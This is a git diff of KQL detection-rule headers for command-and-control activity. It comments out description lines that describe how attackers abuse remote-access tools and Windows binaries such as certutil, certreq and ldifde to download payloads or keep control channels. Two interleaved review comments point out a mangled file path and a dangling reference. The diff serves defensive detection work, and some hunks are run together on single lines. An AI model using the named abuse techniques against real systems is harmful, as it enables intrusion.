diff --git a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql
index d0e6c8ac..a55fccd8 100644
--- a/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql
+++ b/KQL/rules/Command and Control/gotoassist_temporary_installation_artefact.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-13
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
index c4890547..8e81c6be 100644
--- a/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
+++ b/KQL/rules/Command and Control/import_ldap_data_interchange_format_file_via_ldifde_exe.kql
@@ -3,7 +3,6 @@
 // Date: 2022-09-02
 // Level: medium
 // Description: Detects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.defense-evasion, attack.t1218, attack.t1105
 // False Positives:
diff --git a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql index ed761e87..612c4319 100644 --- a/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql +++ b/KQL/rules/Command and Control/local_network_connection_initiated_by_script_interpreter.kql @@ -3,7 +3,6 @@ // Date: 2022-08-28 // Level: medium // Description: Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql index 7ba54289..e4b55399 100644 --- a/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql +++ b/KQL/rules/Command and Control/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql @@ -3,8 +3,7 @@ // Date: 2022-05-28 // Level: high // Description: Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any -anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json - +// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql index a482031b..3d8afe17 100644 
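Review bot: The artefact path in the added comment line for the OneDriveStandaloneUpdater rule, `C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json`, appears to have lost the `\P` between `StandaloneUpdater` and `PreSignInSettingsConfig.json`; the LOLBAS/Sigma entry for this binary names the dropped file `...\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`, so an analyst pivoting on the string as written would hunt for a filename that does not exist. Whether the characters were dropped upstream or by the conversion script is not visible here, but it is worth checking the generator's string handling, since the `C:\Windows\System32\config\RegBack` path in the periodic-backup hunk survived intact, which suggests the loss is specific to this rule rather than a general escaping problem. Suggested line: `// anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`. Beyond that, the `//` prefix on the continuation line is what makes this header parse as KQL, so the change itself is correct.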
--- a/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_by_imewdbld_exe.kql @@ -3,7 +3,6 @@ // Date: 2022-01-22 // Level: high // Description: Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql index 1a8a3a05..02cb3442 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_from_process_located_in_potentially_suspicious_or_uncommon_location.kql @@ -3,7 +3,6 @@ // Date: 2017-03-19 // Level: high // Description: Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1105 diff --git a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql index 008d3ad0..084bc6b6 100644 --- a/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql +++ b/KQL/rules/Command and Control/network_connection_initiated_to_azurewebsites_net_by_non_browser_process.kql 
@@ -3,7 +3,6 @@ // Date: 2024-06-24 // Level: medium // Description: Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1102, attack.t1102.001 diff --git a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql index 60068ecd..e717d49b 100644 --- a/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql +++ b/KQL/rules/Command and Control/new_connection_initiated_to_potential_dead_drop_resolver_domain.kql @@ -3,8 +3,7 @@ // Date: 2022-08-17 // Level: high // Description: Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. -In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. - +// In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1102, attack.t1102.001 // False Positives: diff --git a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql index 23c68aef..788bb520 100644 --- a/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql +++ b/KQL/rules/Command and Control/potentially_suspicious_usage_of_qemu.kql 
@@ -3,8 +3,7 @@ // Date: 2024-06-03 // Level: medium // Description: Detects potentially suspicious execution of the Qemu utility in a Windows environment. -Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. - +// Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1090, attack.t1572 diff --git a/KQL/rules/Command and Control/pua_ngrok_execution.kql b/KQL/rules/Command and Control/pua_ngrok_execution.kql index 49f5032c..491b88e1 100644 --- a/KQL/rules/Command and Control/pua_ngrok_execution.kql +++ b/KQL/rules/Command and Control/pua_ngrok_execution.kql @@ -3,8 +3,7 @@ // Date: 2021-05-14 // Level: high // Description: Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. -Involved domains are bin.equinox.io for download and *.ngrok.io for connections. - +// Involved domains are bin.equinox.io for download and *.ngrok.io for connections. // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1572 // False Positives: diff --git a/KQL/rules/Command and Control/quickassist_execution.kql b/KQL/rules/Command and Control/quickassist_execution.kql index 3cc1f417..5c5f13fb 100644 --- a/KQL/rules/Command and Control/quickassist_execution.kql +++ b/KQL/rules/Command and Control/quickassist_execution.kql @@ -3,7 +3,6 @@ // Date: 2024-12-19 // Level: low // Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access. - // MITRE Tactic: Command and Control // Tags: attack.command-and-control, attack.t1219.002 // False Positives: 
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
index 1d75ae98..f84a0641 100644
--- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-11
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
index a8ad8d6d..2f688535 100644
--- a/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_anydesk_execution_from_suspicious_folder.kql
@@ -3,9 +3,8 @@
 // Date: 2022-05-20
 // Level: high
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
index 2bfbcc78..63cf323e 100644
--- a/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_gotoassist_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-13
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
index 82465ebb..3a02dfc9 100644
--- a/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_logmein_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-11
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
index a761d102..933328ab 100644
--- a/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_meshagent_command_execution_via_meshcentral.kql
@@ -3,8 +3,7 @@
 // Date: 2024-09-22
 // Level: medium
 // Description: Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
-MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
-
+// MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
index b361e753..f1128c2c 100644
--- a/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_netsupport_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-09-25
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
index fb076c21..4e947b67 100644
--- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_macos.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-19
 // Level: medium
 // Description: Detects potential execution of MeshAgent which is a tool used for remote access.
-Historical data shows that threat actors rename MeshAgent binary to evade detection.
-Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
-
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
index 1f6df197..2c038b27 100644
--- a/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_potential_meshagent_execution_windows.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-19
 // Level: medium
 // Description: Detects potential execution of MeshAgent which is a tool used for remote access.
-Historical data shows that threat actors rename MeshAgent binary to evade detection.
-Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
-
+// Historical data shows that threat actors rename MeshAgent binary to evade detection.
+// Matching command lines with the '--meshServiceName' argument can indicate that the MeshAgent is being used for remote access.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
index 81fbccc5..b2a13fc3 100644
--- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_macos.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-19
 // Level: high
 // Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
-RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
-However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
-
+// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
diff --git a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql
index c6254295..0adbbe6e 100644
--- a/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_renamed_meshagent_execution_windows.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-19
 // Level: high
 // Description: Detects the execution of a renamed instance of the Remote Monitoring and Management (RMM) tool, MeshAgent.
-RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
-However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
-
+// RMM tools such as MeshAgent are commonly utilized by IT administrators for legitimate remote support and system management.
+// However, malicious actors may exploit these tools by renaming them to bypass detection mechanisms, enabling unauthorized access and control over compromised systems.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.defense-evasion, attack.t1219.002, attack.t1036.003
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql
index 0a95d2e4..4b65c2ec 100644
--- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-13
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
index 28c1bf37..78ef6bc3 100644
--- a/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_screenconnect_potential_suspicious_remote_command_execution.kql
@@ -3,7 +3,6 @@
 // Date: 2022-02-25
 // Level: medium
 // Description: Detects potentially suspicious child processes launched via the ScreenConnect client service.
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql
index 222a5089..27d66443 100644
--- a/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_simple_help_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2024-02-23
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
index 22cd54bc..27505599 100644
--- a/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_tacticalrmm_agent_registration_to_potentially_attacker_controlled_server.kql
@@ -3,9 +3,8 @@
 // Date: 2025-05-29
 // Level: medium
 // Description: Detects TacticalRMM agent installations where the --api, --auth, and related flags are used on the command line.
-These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.
-This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.
-
+// These parameters configure the agent to connect to a specific RMM server with authentication, client ID, and site ID.
+// This technique could indicate a threat actor attempting to register the agent with an attacker-controlled RMM infrastructure silently.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219, attack.t1105
 // False Positives:
diff --git a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql
index f760057f..bf284ccc 100644
--- a/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql
+++ b/KQL/rules/Command and Control/remote_access_tool_ultraviewer_execution.kql
@@ -3,9 +3,8 @@
 // Date: 2022-09-25
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql
index 04f718e6..f1ca8a9d 100644
--- a/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql
+++ b/KQL/rules/Command and Control/renamed_vscode_code_tunnel_execution_file_indicator.kql
@@ -3,7 +3,6 @@
 // Date: 2023-10-25
 // Level: high
 // Description: Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control
diff --git a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql
index ffd1f6af..056b4f88 100644
--- a/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql
+++ b/KQL/rules/Command and Control/screenconnect_temporary_installation_artefact.kql
@@ -3,9 +3,8 @@
 // Date: 2022-02-13
 // Level: medium
 // Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
-These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
-Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
-
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
 // False Positives:
diff --git a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql
index f4cb275b..00da7605 100644
--- a/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql
+++ b/KQL/rules/Command and Control/suspicious_binary_writes_via_anydesk.kql
@@ -3,9 +3,8 @@
 // Date: 2022-09-28
 // Level: high
 // Description: Detects AnyDesk writing binary files to disk other than "gcapi.dll".
-According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
-which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
-
+// According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
+// which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1219.002
diff --git a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql
index a8c50100..34ab42d8 100644
--- a/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql
+++ b/KQL/rules/Command and Control/suspicious_certreq_command_to_download.kql
@@ -3,9 +3,8 @@
 // Date: 2021-11-24
 // Level: high
 // Description: Detects a suspicious CertReq execution downloading a file.
-This behavior is often used by attackers to download additional payloads or configuration files.
-Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.
-
+// This behavior is often used by attackers to download additional payloads or configuration files.
+// Certreq is a built-in Windows utility used to request and retrieve certificates from a certification authority (CA). However, it can be abused by threat actors for malicious purposes.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1105
 // False Positives:
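Review bot: The new comment in the anydesk hunk ends with "(See reference section for more details)", but the header keys visible in this hunk are only Date, Level, Description, MITRE Tactic and Tags, so the pointer may now lead nowhere in the KQL file. If the conversion does not carry the source references across, either add a `// References: <REFERENCE-URL-PLACEHOLDER>` line to the header or drop the parenthetical; which of the two is right depends on whether the converter has a references field, which is not visible here.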
diff --git a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
index 8bfd93fa..a919392d 100644
--- a/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
+++ b/KQL/rules/Command and Control/suspicious_non_browser_network_communication_with_google_api.kql
@@ -3,7 +3,6 @@
 // Date: 2023-05-01
 // Level: medium
 // Description: Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1102
 // False Positives:
diff --git a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
index b8ab8d3a..493f650f 100644
--- a/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
+++ b/KQL/rules/Command and Control/uncommon_network_connection_initiated_by_certutil_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2022-09-02
 // Level: high
 // Description: Detects a network connection initiated by the certutil.exe utility.
-Attackers can abuse the utility in order to download malware or additional payloads.
-
+// Attackers can abuse the utility in order to download malware or additional payloads.
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control, attack.t1105
diff --git a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
index d19487f5..a123605d 100644
--- a/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
+++ b/KQL/rules/Command and Control/visual_studio_code_tunnel_remote_file_creation.kql
@@ -3,7 +3,6 @@
 // Date: 2023-10-25
 // Level: medium
 // Description: Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
-
 // MITRE Tactic: Command and Control
 // Tags: attack.command-and-control
